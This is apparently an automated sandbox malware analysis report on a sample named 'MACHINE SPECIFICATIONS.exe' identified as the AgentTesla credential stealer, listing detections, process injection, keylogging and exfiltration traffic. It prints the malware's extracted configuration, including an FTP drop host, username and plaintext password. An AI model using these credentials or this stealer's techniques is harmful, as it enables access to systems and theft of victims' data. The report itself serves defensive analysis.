Edit tour

Windows Analysis Report
MACHINE SPECIFICATIONS.exe

Overview

General Information

Sample Name:	MACHINE SPECIFICATIONS.exe
Analysis ID:	755960
MD5:	92945d0a2731ef771ea9d10c792e03e1
SHA1:	1eeef600b7b51ce7aa93e825be55b40f3ef8e319
SHA256:	46b61250c34b38d26ac5897217e6b70a222ff16318161c4e67c74c74491cc612
Tags:	exe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Yara detected AgentTesla

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Installs a global keyboard hook

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

.NET source code references suspicious native API functions

Machine Learning detection for sample

May check the online IP address of the machine

Injects a PE file into a foreign processes

.NET source code contains very large array initializations

Hides that the sample has been downloaded from the Internet (zone.identifier)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Drops PE files

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Creates a window with clipboard capturing capabilities

Uses FTP

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

MACHINE SPECIFICATIONS.exe (PID: 6128 cmdline: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe MD5: 92945D0A2731EF771EA9D10C792E03E1)

CasPol.exe (PID: 688 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: F866FC1C2E928779C7119353C3091F0C)

newapp.exe (PID: 4272 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: F866FC1C2E928779C7119353C3091F0C)

conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

newapp.exe (PID: 676 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: F866FC1C2E928779C7119353C3091F0C)

conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.electrobist.com", "Username": "user1@electrobist.com", "Password": "w&oNc9e]pf~4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31fc8:$a13: get_DnsResolver 0x306b2:$a20: get_LastAccessed 0x329f6:$a27: set_InternalServerPort 0x32d2b:$a30: set_GuidMasterKey 0x307c4:$a33: get_Clipboard 0x307d2:$a34: get_Keyboard 0x31bae:$a35: get_ShiftKeyDown 0x31bbf:$a36: get_AltKeyDown 0x307df:$a37: get_Password 0x31303:$a38: get_PasswordHash 0x3242a:$a39: get_DefaultCredentials
0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 688	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 688	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 688	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x28778:$a13: get_DnsResolver 0x270d1:$a20: get_LastAccessed 0x29155:$a27: set_InternalServerPort 0x293bc:$a30: set_GuidMasterKey 0x271cc:$a33: get_Clipboard 0x271da:$a34: get_Keyboard 0x283fa:$a35: get_ShiftKeyDown 0x2840b:$a36: get_AltKeyDown 0x271e7:$a37: get_Password 0x27c5e:$a38: get_PasswordHash 0x28bae:$a39: get_DefaultCredentials
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.0.CasPol.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.0.CasPol.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
10.0.CasPol.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x34d04:$s10: logins 0x3477e:$s11: credential 0x309c4:$g1: get_Clipboard 0x309d2:$g2: get_Keyboard 0x309df:$g3: get_Password 0x31d9e:$g4: get_CtrlKeyDown 0x31dae:$g5: get_ShiftKeyDown 0x31dbf:$g6: get_AltKeyDown
10.0.CasPol.exe.400000.0.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x321c8:$a13: get_DnsResolver 0x308b2:$a20: get_LastAccessed 0x32bf6:$a27: set_InternalServerPort 0x32f2b:$a30: set_GuidMasterKey 0x309c4:$a33: get_Clipboard 0x309d2:$a34: get_Keyboard 0x31dae:$a35: get_ShiftKeyDown 0x31dbf:$a36: get_AltKeyDown 0x309df:$a37: get_Password 0x31503:$a38: get_PasswordHash 0x3262a:$a39: get_DefaultCredentials

Snort Signatures

ET TROJAN AgentTesla Exfil via FTP - Source IP: 192.168.2.3 - Destination IP: 51.195.62.160

Timestamp:	192.168.2.351.195.62.16049702212029927 11/29/22-11:20:12.397759
SID:	2029927
Source Port:	49702
Destination Port:	21
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.3 - Destination IP: 51.195.62.160

Timestamp:	192.168.2.351.195.62.16049703522592851779 11/29/22-11:20:12.420526
SID:	2851779
Source Port:	49703
Destination Port:	52259
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: MACHINE SPECIFICATIONS.exe	Virustotal: Detection: 58%			Perma Link
Source: MACHINE SPECIFICATIONS.exe	ReversingLabs: Detection: 73%

Antivirus detection for URL or domain

Source: http://ftp.electrobist.com

Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: MACHINE SPECIFICATIONS.exe

Joe Sandbox ML: detected

Source: 10.0.CasPol.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Source: 10.0.CasPol.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.electrobist.com", "Username": "user1@electrobist.com", "Password": "w&oNc9e]pf~4"}

Source: unknown

HTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.3:49701 version: TLS 1.2

Source: MACHINE SPECIFICATIONS.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: caspol.pdbdv source: CasPol.exe, 0000000A.00000003.399059752.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000000.387084223.0000000000802000.00000002.00000001.01000000.00000007.sdmp, newapp.exe.10.dr
Source:	Binary string: caspol.pdb source: CasPol.exe, 0000000A.00000003.399059752.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000000.387084223.0000000000802000.00000002.00000001.01000000.00000007.sdmp, newapp.exe.10.dr
Source:	Binary string: C:\Users\Memm\Downloads\JesusIsTheLord\obj\Debug\Meme.pdb source: MACHINE SPECIFICATIONS.exe

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.3:49702 -> 51.195.62.160:21
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49703 -> 51.195.62.160:52259

May check the online IP address of the machine

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	DNS query: name: api.ipify.org

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Joe Sandbox View	IP Address: 51.195.62.160 51.195.62.160
Source: Joe Sandbox View	IP Address: 3.220.57.224 3.220.57.224
Source: Joe Sandbox View	IP Address: 3.220.57.224 3.220.57.224

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.3:49703 -> 51.195.62.160:52259

Source: unknown

FTP traffic detected: 51.195.62.160:21 -> 192.168.2.3:49702 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 0000000A.00000003.409423403.000000000592A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.779812564.000000000592A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.399211019.000000000590A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 0000000A.00000002.772635350.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.772655142.0000000002B6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.electrobist.com
Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xgrPBN.com
Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgftp://ftp.electrobist.comuser1
Source: CasPol.exe, 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.772635350.0000000002B66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://eyUBHCqVhczCNfHAY6U.org
Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.3:49701 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown

.NET source code contains very large array initializations

Source: 10.0.CasPol.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b209BAEF0u002dB9D1u002d4EDCu002d916Au002d070C59DE070Au007d/E2113872u002d1804u002d41A9u002d8E9Fu002d0420E9801409.cs

Large array initialization: .cctor: array initializer size 11016

Source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_023FFC48	10_2_023FFC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_023F6D20	10_2_023F6D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05DF9708	10_2_05DF9708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05DFF2A0	10_2_05DFF2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05DFBE50	10_2_05DFBE50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05DFB4E0	10_2_05DFB4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05DF84B8	10_2_05DF84B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05DF8408	10_2_05DF8408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05DFD9A8	10_2_05DFD9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05E90480	10_2_05E90480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05E92170	10_2_05E92170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05E9BC40	10_2_05E9BC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05E95F40	10_2_05E95F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05E929C8	10_2_05E929C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05E92020	10_2_05E92020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05E9CA68	10_2_05E9CA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05EE3D4C	10_2_05EE3D4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05EE372C	10_2_05EE372C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05EE5668	10_2_05EE5668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05EEC1E0	10_2_05EEC1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05EE0040	10_2_05EE0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05EEC054	10_2_05EEC054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05EE33E4	10_2_05EE33E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05EED3A0	10_2_05EED3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05EE8B28	10_2_05EE8B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05EE3730	10_2_05EE3730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05E93958	10_2_05E93958
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_01130958	11_2_01130958
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 13_2_00C00958	13_2_00C00958

Source: MACHINE SPECIFICATIONS.exe

Static PE information: No import functions for PE file found

Source: MACHINE SPECIFICATIONS.exe

Binary or memory string: OriginalFilenameMeme.exe4 vs MACHINE SPECIFICATIONS.exe

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\newapp\newapp.exe 67F3FC243C58EEAE55BDDC22CE025B7841A89ACA2E201B999D8C0E4F07D177B8

Source: MACHINE SPECIFICATIONS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: MACHINE SPECIFICATIONS.exe	Virustotal: Detection: 58%
Source: MACHINE SPECIFICATIONS.exe	ReversingLabs: Detection: 73%

Source: MACHINE SPECIFICATIONS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MACHINE SPECIFICATIONS.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File created: C:\Users\user\AppData\Local\Temp\tmpA418.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@3/3

Source: newapp.exe.10.dr, Microsoft.Tools.Caspol/caspol.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: newapp.exe.10.dr, Microsoft.Tools.Caspol/caspol.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.0.newapp.exe.800000.0.unpack, Microsoft.Tools.Caspol/caspol.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 11.0.newapp.exe.800000.0.unpack, Microsoft.Tools.Caspol/caspol.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6132:120:WilError_01

Source: MACHINE SPECIFICATIONS.exe, C6ean/Ough6.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 10.0.CasPol.exe.400000.0.unpack, A/f2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 10.0.CasPol.exe.400000.0.unpack, A/f2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: MACHINE SPECIFICATIONS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: MACHINE SPECIFICATIONS.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: MACHINE SPECIFICATIONS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: caspol.pdbdv source: CasPol.exe, 0000000A.00000003.399059752.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000000.387084223.0000000000802000.00000002.00000001.01000000.00000007.sdmp, newapp.exe.10.dr
Source:	Binary string: caspol.pdb source: CasPol.exe, 0000000A.00000003.399059752.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000000.387084223.0000000000802000.00000002.00000001.01000000.00000007.sdmp, newapp.exe.10.dr
Source:	Binary string: C:\Users\Memm\Downloads\JesusIsTheLord\obj\Debug\Meme.pdb source: MACHINE SPECIFICATIONS.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05DFE6F9 pushfd ; ret	10_2_05DFE705
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05DF9C29 push 550241CFh; iretd	10_2_05DF9C85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05DF2A47 push edi; retn 0000h	10_2_05DF2A49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05E9517B push esp; ret	10_2_05E951D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_05E9517B pushad ; ret	10_2_05E95225

Source: initial sample

